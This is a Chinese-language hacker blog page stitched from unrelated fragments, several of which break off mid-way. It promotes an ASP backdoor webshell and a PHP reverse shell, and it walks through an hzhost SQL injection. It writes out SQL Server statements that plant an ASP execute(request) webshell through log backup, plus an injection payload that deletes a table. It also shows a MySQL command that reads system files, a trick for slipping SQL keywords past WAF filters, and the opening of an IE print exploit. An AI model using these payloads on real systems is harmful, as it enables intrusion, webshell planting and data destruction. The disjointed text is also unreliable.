心动吧黑客BLOG

 这一个文章和我以前发布的一个文章正好成了一个对比（文章连接），如果上一次是茅。那么此次这个就是盾了.为什么这样说？请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图：

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

遇到一个BT的网站，上传php文件成功之后，每访问一次，文件名就会随机改变一次，并且你访问当前文件如果点其他操作项，文件仍然会改名。非常无奈，没想 到什么好的办法，后来灵光一闪。放一个php页面，里面 可以直接弹回来shell，何况在console下面操作比webshell方便的多，也不会出现超时之类的情况。
因为我不怎么懂php，于是就找了猥琐 的诺诺和小雨修改了一下代码，反弹代码是从phpspy2008里面提取的，但是不能直接用，需要修改成一个单独的php文件。上传之后，本地监听一个端 口，在代码里设置好反弹IP和端口，然后直接访问，就会弹回来一个shell。

ScriptCodingInfo.wsc代码如下，该文件可以改成任意后缀：

backdoor.asp内容如下：

 Name                    Last modified      Size  Description

--------------------------------------------------------------------------------

 Parent Directory                             -  
 2.2.27/                 27-Dec-2008 16:53    -  
 2.2.x/                  27-Dec-2008 17:01    -  
 2.4.17/                 27-Dec-2008 17:03    -  
 2.4.18/                 27-Dec-2008 17:04    -  
 2.4.19/                 27-Dec-2008 17:05    -  
 2.4.20/                 27-Dec-2008 17:06    -  
 

明生注:这一个篇文章让你学到不少的东西,特别晨突破防注入方面的手段，虽然有点老，但很适合学习用,所以转上来

作者：叉叉兵
这次继续爆hzhost6.5虚拟主机管理系统的SQL注入漏洞。
只讲两个要点。
第一，如何拿网站管理员权限。
第二，如何备份木马。
这次不是简单的注射点，而是经过安全函数过滤的了点。由于对方没有将变量用单引号包起来，而过滤函数又未过滤完全，导致我们有机会进行注射。
我这次还做了个动画。一并发放。希望能让大家玩得"happy"!哈哈。。。

由于我写了很长，而且很累了，所以希望大家回帖鼓励一下。故设置强制回复！

漏洞存在于hzhosthzhost_mastercontrolot2_mngot2_lst.asp文件中！
引用:
-------------------------13-15行----------------------------
querytype=SafeRequest("querytype")  //saferequest函数接受数据
if chk_int(querytype)=false then  //检查是否是整数
   ErrMsg="<font color=#ff0000>对不起</font>，非法操作！..."
-------------------------37-42行---------------------------
elseif querytype=5 then //如果类型为5。就接受qu1数据！
  qu1=trim(SafeRequest("qu1"))      //saferequest函数接受数据，他自己定义的saferequest

有时候遇到目标网站数据库过大，导致备份超时的时候，我们可以通过以下语句进行备份拿webshell

     alter database CaanCn set RECOVERY FULL--

     Drop table [banlg];create table [dbo].[banlg] ([cmd] [image])--

    declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737335393536 backup log @a to disk=@s with init--                    

     insert into banlg(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
 

早前在phpcms 0day频发的时候写的这个exp，藏着这个exp藏了一个多月吧，也没有拿它去打站，一直丢在我硬盘里，今天看到11期的黑防公布了，于是我也丢出来吧：

发现代码中并无出奇, 只是将几年前的冷饭再炒.因为多年过去了, 可能有人疏忽, 多试一些总有人中招的.
注入方式中数字字段是最容易进入的. 文本也可以, 但在QUERYSTRING中提交文本的情况不如数字多.
最常见的就是形如 news.asp?id=3
在ASP中,疏忽的写法为
aspID=request("id")
SQL="SELECT * FROM NEWS WHERE ID=" & aspID
SET RS=Conn.EXEC(SQL)
这里的ID完全没有保护, 如果ID是一个字符串, 很容易就注入了
例如ID=3;delete%20from%20news;
直接删除NEWS表记录
对于文本来说, 例如news.asp?keyword=abc
aspKeyword=request("keyword")
SQL="SELECT * FROM NEWS WHERE TITLE LIKE '%" &aspKeyword& "%'

今天朋友问我如何在mysql下读取文件，把我问愣了，发现自己还是犯了不求甚解的毛病，因此特地查了下mysql使用手册。
思路都一样，在拥有file权限的前提下，读取文件为字符串形式插入表中，然后读出表中数据，只是方式略有不同

mysql3.x下

不确定mysql3.x下能否使用load_file()函数（我在mysql3使用手册上没有查到，但貌似是可以的），用 load data infile 读取文件，命令如下

mysql>create table a (cmd text);
mysql>load data infile 'c:\\boot.ini' into table a;
mysql>select * from a;
 

在试用VIF，功能还不错，有一些还不会用，百度了一下，发现可以突破，试了一下，还是真的，记录起来。两个不同的方法，一个是lake2的，一个是langouster的，不过lake2的方法在VIF下就不能用，因为检测的方式不一样，VIF是检测关键字，只要是包含字符串的都封杀了，而一流信息监控拦截系统，lake2已经在文章中提出，看一下吧。
　　　
　　　先来说URL编码，%加两位的16进制表示一个字符，比如'经过编码之后就是%27，这是人人都知道的URL编码规则，UrlUnescapeInPlace之类的API函数甚至于程序员自己写的URL译码函数都是基于这一思想。
　　　然而，我们何必如此听话，试想一下要是%后跟的不是16进制数字而是像abc%hh会发生什么事呢。先看UrlUnescapeInPlace，写个小程序试一下，abc%hh经过译码还是abc%hh；再看asp.dll是怎么译码的，在asp页面中写入 response.Write(request.QueryString("str"))，然后用?str=abc%hh访问它，页面显示abchh，它直接把%给去掉了。
现在来思考要是我们提交sele%ct，信息监控系统得到的字符串还是sele%ct，当然它不是危险字符，它就不会拦截，但对于ASP，它得到的可就是select了，其它的同理，'可用%&'表示，比如and exists(select * from admin)可转化为以下字符串a%nd ex%ists(%select * %from ad%min)。此方法可举一反三，比如用%%代替%都可以，还可以是其它的，具体的可以去看RFC2396。
以上仅是对于GET方式的分析，POST没试

测试成功，会运行计算器
只是利用起来有点 ... ...
这个漏洞是由于微软IE浏览器启动“Print Table of Links”时引起的跨站攻击（Cross-Zone Scripting ）

如果启用了 "Print Table of Links"，在打印一个网页的时候，能够导致执行任意代码。

1.选择“Print Table of Links”选项

2.把保存以下代码为HTML格式，用IE打开，并打印，会执行calc.exe。

<html>
<body>
Print me with table of links to execute calc.exe